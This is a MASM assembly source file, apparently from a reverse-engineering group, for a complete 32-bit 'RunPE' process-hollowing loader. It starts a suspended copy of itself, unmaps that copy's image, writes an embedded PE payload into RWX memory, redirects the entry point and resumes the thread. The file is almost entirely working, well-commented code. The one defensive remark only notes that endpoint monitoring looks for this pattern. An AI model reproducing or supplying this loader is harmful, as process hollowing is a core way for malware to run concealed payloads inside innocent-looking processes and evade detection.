; ::::: Running Process from memory :::::
; ::::: 32-bit "RunPE" / process-hollowing loader: a suspended copy of this
; ::::: executable is unmapped and the PE image embedded in `file`
; ::::: (from ExecuteFromMem.Inc) is written in its place and resumed. :::::
; ::::: GamingMasteR -AT4RE :::::
.386p
.model flat, stdcall
option casemap: none
include windows.inc
include kernel32.inc
include ntdll.inc
include ExecuteFromMem.Inc
includelib kernel32.lib
includelib ntdll.lib
.data
myname db "ExecuteFromMem.exe",0
.data?
.code
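;-----------------------------------------------------------------------
; main - entry point.  Hollows a suspended copy of this executable and
; runs the PE image embedded in `file` inside it:
;   1. CreateProcess(self, CREATE_SUSPENDED)
;   2. GetThreadContext on the not-yet-started main thread
;   3. ZwUnmapViewOfSection of the child's original image
;   4. VirtualAllocEx(child, payload.ImageBase, payload.SizeOfImage, RWX)
;   5. WriteProcessMemory: headers, then every section's raw data
;   6. SetThreadContext with EAX = new entry point, ResumeThread
; In     : none (the command line is not forwarded to the child).
; Out    : none.  Returns after the child is resumed, or after terminating
;          a child that could not be prepared (every API result is checked;
;          a failure after CreateProcess terminates the suspended child so
;          no half-built process is left behind).
; Clobbers: eax, ebx, ecx, edx, esi, edi, flags (entry point - nothing
;          above us expects callee-saved registers preserved).
;
; Assumptions the code makes and does not verify:
;   - No relocation is applied: the payload must load at exactly
;     OptionalHeader.ImageBase.  If that address is unavailable in the
;     child, VirtualAllocEx fails and we abort instead of running a
;     misplaced image.
;   - The child's original image base is taken from GetModuleHandle(0) of
;     *this* process; that only matches the child because the child is the
;     same executable (`myname`).
;   - NOTE(review): the child's PEB.ImageBaseAddress is not updated.  If the
;     payload's ImageBase differs from this executable's, the child's PEB
;     still names the old base - confirm whether the payload needs that.
;   - The whole image is committed PAGE_EXECUTE_READWRITE; per-section
;     protections are not applied.  Imports are left to the payload's own
;     loader path, which is not handled here.
;   - Only CONTEXT_INTEGER is captured/restored; EAX is relied on as the
;     register the thread start stub reads the entry point from (what the
;     original code depends on).
;
; Defensive note: this exact sequence (CREATE_SUSPENDED, NtUnmapViewOfSection,
; cross-process WriteProcessMemory into an RWX region, SetThreadContext,
; ResumeThread) is the classic process-hollowing pattern that endpoint
; monitoring looks for.
;-----------------------------------------------------------------------
main proc
    LOCAL sinfo: STARTUPINFO
    LOCAL pinfo: PROCESS_INFORMATION
    LOCAL base: dword
    LOCAL sec: ptr IMAGE_SECTION_HEADER
    LOCAL cnt: CONTEXT

    ; STARTUPINFO.cb must carry the structure size before CreateProcess
    ; reads it; everything else stays zero (default startup).
    invoke RtlZeroMemory, addr sinfo, sizeof STARTUPINFO
    mov sinfo.cb, sizeof STARTUPINFO
    invoke RtlZeroMemory, addr pinfo, sizeof PROCESS_INFORMATION

    ; Start a second copy of ourselves with its main thread suspended: it
    ; has run no user-mode code yet, so its initial state can be replaced.
    invoke CreateProcess, addr myname, 0, 0, 0, 0, CREATE_SUSPENDED, 0, 0, addr sinfo, addr pinfo
    .if eax == 0
        ret                                 ; no child was created; nothing to clean up
    .endif

    ; Snapshot the main thread's integer registers (EBX and friends are
    ; written back unchanged later; only EAX is replaced).
    invoke RtlZeroMemory, addr cnt, sizeof CONTEXT
    mov cnt.ContextFlags, CONTEXT_INTEGER
    invoke GetThreadContext, pinfo.hThread, addr cnt
    .if eax == 0
        jmp abort_child
    .endif

    ; Drop the child's original image.  One call suffices: all of its
    ; sections belong to the same mapped view.  The base comes from our
    ; own module handle - valid only because the child is the same exe.
    invoke GetModuleHandle, 0
    invoke ZwUnmapViewOfSection, pinfo.hProcess, eax
    .if eax != 0                            ; NTSTATUS: 0 is STATUS_SUCCESS
        jmp abort_child
    .endif

    ; edi -> IMAGE_NT_HEADERS of the embedded payload.
    mov edi, offset file
    add edi, IMAGE_DOS_HEADER.e_lfanew[edi]
    assume edi: ptr IMAGE_NT_HEADERS

    ; Reserve and commit the payload's full virtual image at its preferred
    ; base.  NULL here means the address is taken (or the child is gone);
    ; with no relocation support the only safe answer is to abort.
    invoke VirtualAllocEx, pinfo.hProcess, [edi].OptionalHeader.ImageBase, [edi].OptionalHeader.SizeOfImage, MEM_COMMIT + MEM_RESERVE, PAGE_EXECUTE_READWRITE
    .if eax == 0
        jmp abort_child
    .endif
    mov base, eax

    ; Headers first: DOS stub, NT headers and the section table.
    invoke WriteProcessMemory, pinfo.hProcess, base, addr file, [edi].OptionalHeader.SizeOfHeaders, 0
    .if eax == 0
        jmp abort_child
    .endif

    ; The section table starts immediately after the optional header.
    lea eax, [edi].OptionalHeader
    movzx ecx, [edi].FileHeader.SizeOfOptionalHeader
    add eax, ecx
    mov sec, eax

    ; Copy every section's raw file bytes to its VirtualAddress in the
    ; child.  esi = section index; eax = &section[esi], recomputed each
    ; pass because the call clobbers it.  edi/esi survive the stdcall calls.
    xor esi, esi
    .while ( si < [edi].FileHeader.NumberOfSections )
        imul eax, esi, sizeof IMAGE_SECTION_HEADER
        add eax, sec
        mov ebx, base
        add ebx, IMAGE_SECTION_HEADER.VirtualAddress[eax]          ; ebx = remote dest
        mov edx, offset file
        add edx, IMAGE_SECTION_HEADER.PointerToRawData[eax]        ; edx = local src
        invoke WriteProcessMemory, pinfo.hProcess, ebx, edx, IMAGE_SECTION_HEADER.SizeOfRawData[eax], 0
        .if eax == 0
            jmp abort_child
        .endif
        inc esi
    .endw

    ; Point the start stub at the new code: EAX = base + entry-point RVA.
    mov eax, base
    add eax, [edi].OptionalHeader.AddressOfEntryPoint
    mov cnt.regEax, eax
    assume edi: nothing
    invoke SetThreadContext, pinfo.hThread, addr cnt
    .if eax == 0
        jmp abort_child
    .endif

    ; Release the thread; -1 means the resume itself failed.
    invoke ResumeThread, pinfo.hThread
    .if eax == -1
        jmp abort_child
    .endif
    invoke CloseHandle, pinfo.hThread
    invoke CloseHandle, pinfo.hProcess
    ret

abort_child:
    ; A step after CreateProcess failed: kill the suspended, half-built
    ; child rather than leaving it around, then release our handles.
    invoke TerminateProcess, pinfo.hProcess, 1
    invoke CloseHandle, pinfo.hThread
    invoke CloseHandle, pinfo.hProcess
    ret
main endp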
end main